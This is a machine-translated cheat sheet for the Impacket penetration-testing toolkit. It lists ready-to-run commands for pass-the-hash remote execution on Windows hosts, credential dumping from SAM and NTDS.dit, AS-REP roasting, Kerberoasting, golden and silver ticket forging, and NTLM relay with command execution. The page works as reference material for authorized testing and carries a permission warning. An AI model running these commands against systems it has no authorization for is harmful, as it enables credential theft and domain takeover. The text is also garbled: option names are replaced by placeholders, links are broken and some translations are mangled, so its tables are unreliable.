Saltar a contenido

Impacket

Impacket Toolkit Cheat Sheet

__HTML_TAG_139_ Todos los comandos

Overview

Impacket es una colección de clases de Python para trabajar con protocolos de red. Proporciona acceso programático de bajo nivel a paquetes e implementa varios protocolos incluyendo SMB, MSRPC y Kerberos. Impacket incluye numerosas herramientas listas para usar para pruebas de penetración, especialmente centradas en entornos de Windows.

▪ restablecimiento Advertencia: Impacket es una herramienta de pruebas de seguridad que sólo debe usarse en entornos donde tiene permiso explícito para hacerlo.

Instalación

From PyPI

pip install impacket

From GitHub

git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

On Kali Linux

sudo apt update
sudo apt install -y python3-impacket

Usando Medio Ambiente Virtual

# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate  # Linux/macOS
impacket-env\Scripts\activate.bat  # Windows

# Install Impacket
pip install impacket

Command Execution Tools

psexec.py

Ejecute comandos en sistemas remotos de Windows usando el protocolo SMB, similar al PsExec de SysInternals.

Uso básico
psexec.py [domain/]username[:password]@target [options] [command]
Opciones comunes
Option Description
INLINE_CODE_32 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_33 Use Kerberos authentication
INLINE_CODE_34 Don't ask for password (useful for Kerberos)
INLINE_CODE_35 Connect to SMB Server port (default: 445)
INLINE_CODE_36 Turn DEBUG output ON
_
##### Ejemplos 
# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe

# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe

# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe

smbexec. py

Similar a psexec.py pero utiliza diferentes técnicas para ejecutar comandos, lo que lo hace potencialmente sigilo.

Uso básico
smbexec.py [domain/]username[:password]@target [options]
Opciones comunes
Option Description
INLINE_CODE_37 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_38 Share where the output will be grabbed from (default: ADMIN$)
INLINE_CODE_39 Shell type to use (default: cmd)
INLINE_CODE_40 Sets encoding used (codec) from the target's output (default: UTF-8)
INLINE_CODE_41 Service name to use (default: random)
Ejemplos
# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100

wmiexec. py

Ejecute comandos en sistemas remotos de Windows usando WMI.

Uso básico
wmiexec.py [domain/]username[:password]@target [options] [command]
Opciones comunes
Option Description
INLINE_CODE_42 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_43 Share where the output will be grabbed from (default: ADMIN$)
INLINE_CODE_44 Execute command and return immediately without output
INLINE_CODE_45 Sets encoding used (codec) from the target's output (default: UTF-8)
INLINE_CODE_46 Shell type to use (default: cmd)
Ejemplos
# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100

# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

dcomexec. py

Ejecute comandos en sistemas remotos de Windows usando objetos DCOM.

Uso básico
dcomexec.py [domain/]username[:password]@target [options] [command]
Opciones comunes
Option Description
INLINE_CODE_47 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_48 DCOM object to use (default: MMC20.Application)
INLINE_CODE_49 Execute command and return immediately without output
INLINE_CODE_50 Sets encoding used (codec) from the target's output (default: UTF-8)
INLINE_CODE_51 Shell type to use (default: cmd)
Ejemplos
# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100

# Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

atexec.py

Ejecute comandos en sistemas remotos de Windows usando el servicio Task Scheduler.

Uso básico
atexec.py [domain/]username[:password]@target [options] command
Opciones comunes
Option Description
INLINE_CODE_52 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_53 Execute command and return immediately without output
INLINE_CODE_54 Sets encoding used (codec) from the target's output (default: UTF-8)
Ejemplos
# Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

Credential Dumping Tools

Secretsdump. py

Extrae las credenciales de un sistema remoto de Windows, incluyendo SAM, LSA Secrets, y NTDS.dit.

Uso básico
secretsdump.py [domain/]username[:password]@target [options]
Opciones comunes
Option Description
INLINE_CODE_55 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_56 Extract only NTDS.DIT data (domain controller only)
INLINE_CODE_57 Extract only NTDS.DIT NTLM hashes (domain controller only)
INLINE_CODE_58 Extract only NTDS.DIT data for specific user
INLINE_CODE_59 Shows pwdLastSet attribute for each NTDS.DIT account
INLINE_CODE_60 Shows whether the user is enabled or disabled
INLINE_CODE_61 Dump password history
INLINE_CODE_62 Write output to file
_
##### Ejemplos 
# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100

# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100

# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL

# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100

Kerberos Attack Tools

GetNPUsers.py

Retrieves contraseña hashes para los usuarios con "No requieren preauthentication de Kerberos" conjunto (ASREPRoast attack).

Uso básico
GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]
Opciones comunes
Option Description
INLINE_CODE_63 Requests TGT for users and output them in JtR/hashcat format
INLINE_CODE_64 Don't ask for password (useful for Kerberos)
INLINE_CODE_65 Use Kerberos authentication
INLINE_CODE_66 IP Address of the domain controller
INLINE_CODE_67 File with user per line to test
INLINE_CODE_68 Format to save the AS_REP responses (default: hashcat)
INLINE_CODE_69 Output filename to write ciphers in JtR/hashcat format
_
##### Ejemplos 
# Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request

# Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1

# Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat

# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass

GetUserSPNs.py

Retrieves Service Principal Names (SPNs) para las cuentas en el dominio (Kerberoasting attack).

Uso básico
GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]
Opciones comunes
Option Description
INLINE_CODE_70 Requests TGS for users and output them in JtR/hashcat format
INLINE_CODE_71 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_72 IP Address of the domain controller
INLINE_CODE_73 Target specific user to request TGS for
INLINE_CODE_74 Output filename to write ciphers in JtR/hashcat format
INLINE_CODE_75 Format to save the TGS tickets (default: hashcat)
_
##### Ejemplos 
# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request

# Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice

# Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat

# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request

Ticketer. py

Crea entradas de oro y plata para la autenticación de Kerberos.

Uso básico
ticketer.py [options] username
Opciones comunes
Option Description
INLINE_CODE_76 NT hash for the user or service account
INLINE_CODE_77 AES key for the user or service account
INLINE_CODE_78 Domain name
INLINE_CODE_79 Domain SID
INLINE_CODE_80 Service Principal Name (for Silver Tickets)
INLINE_CODE_81 Comma-separated list of group IDs to include in the ticket
INLINE_CODE_82 Ticket duration in hours (default: 10)
INLINE_CODE_83 Output filename to save the ticket
_
##### Ejemplos 
# Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator

# Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator

# Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator

Red Protocols Tools

Smbclient. py

Proporciona un cliente SMB para acceder a acciones y archivos en sistemas remotos.

Uso básico
smbclient.py [domain/]username[:password]@target [options]
Opciones comunes
Option Description
INLINE_CODE_84 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_85 Connect to SMB Server port (default: 445)
INLINE_CODE_86 Input file with commands to execute in the mini shell
INLINE_CODE_87 Turn DEBUG output ON
_
#### Comandos Comunitarios Interactivos
##### Ejemplos 
# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100

# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

mssqlclient. py

Proporciona un cliente para interactuar con las instancias de Microsoft SQL Server.

Uso básico
mssqlclient.py [domain/]username[:password]@target [options]
Opciones comunes
Option Description
INLINE_CODE_99 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_100 Use Windows Authentication (default: False)
INLINE_CODE_101 Destination port to connect to (default: 1433)
INLINE_CODE_102 MSSQL database instance (default: None)
INLINE_CODE_103 Input file with commands to execute in the SQL shell
INLINE_CODE_104 Turn DEBUG output ON

Comandos Comunitarios Interactivos

Ejemplos
# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100

# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100

# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth

Otras herramientas útiles

ntlmrelayx. py

Performs NTLM Atentados de relé.

Uso básico
ntlmrelayx.py [options]
Opciones comunes
Option Description
INLINE_CODE_111 Target to relay the credentials to
INLINE_CODE_112 File with targets to relay the credentials to
INLINE_CODE_113 Start the HTTP server and do not relay credentials
INLINE_CODE_114 Execute this file when a connection is relayed
INLINE_CODE_115 Execute this command when a connection is relayed
INLINE_CODE_116 Enable SMB2 support
INLINE_CODE_117 Launch a SOCKS proxy for the connection
INLINE_CODE_118 Relay only one connection
INLINE_CODE_119 Turn DEBUG output ON
Ejemplos
# Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support

# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support

# Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\\temp\\whoami.txt"

# Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d

# Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks

Lookupsid. py

Realiza búsquedas SID para enumerar usuarios y grupos.

Uso básico
lookupsid.py [domain/]username[:password]@target [options]
Opciones comunes
Option Description
INLINE_CODE_120 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_121 Domain to enumerate (default: target domain)
INLINE_CODE_122 Turn DEBUG output ON
Ejemplos
# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100

# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

reg.py

Proporciona una herramienta de manipulación remota del registro.

Uso básico
reg.py [domain/]username[:password]@target [options] action [params]
Opciones comunes
Option Description
INLINE_CODE_123 Use NTLM hashes instead of password (Pass-the-Hash)
INLINE_CODE_124 Turn DEBUG output ON

Actions

Action Description
INLINE_CODE_125 Query a registry key or value
INLINE_CODE_126 Add a registry key or value
INLINE_CODE_127 Delete a registry key or value
INLINE_CODE_128 Save a registry hive to a file
_
##### Ejemplos 
# Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\\SOFTWARE\\Test -v TestValue -vt REG_SZ -vd "Test Data"

# Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\\SOFTWARE\\Test

Parámetros comunes a través de herramientas

Parameter Description
INLINE_CODE_129 Show help message and exit
INLINE_CODE_130 Turn DEBUG output ON
INLINE_CODE_131 NTLM hashes, format is LMHASH:NTHASH
INLINE_CODE_132 Don't ask for password (useful for Kerberos)
INLINE_CODE_133 Use Kerberos authentication
INLINE_CODE_134 AES key to use for Kerberos authentication
INLINE_CODE_135 IP Address of the domain controller
INLINE_CODE_136 IP Address of the target machine
INLINE_CODE_137 Destination port to connect to

Resources

  • [Repositorio de GitHub Official](URL_144_
  • [Impacket Documentation](URL_145__
  • [ Ejemplos de paquete](URL_146_
  • [Impacket Wiki]
  • [Impacket API Documentation](URL_148__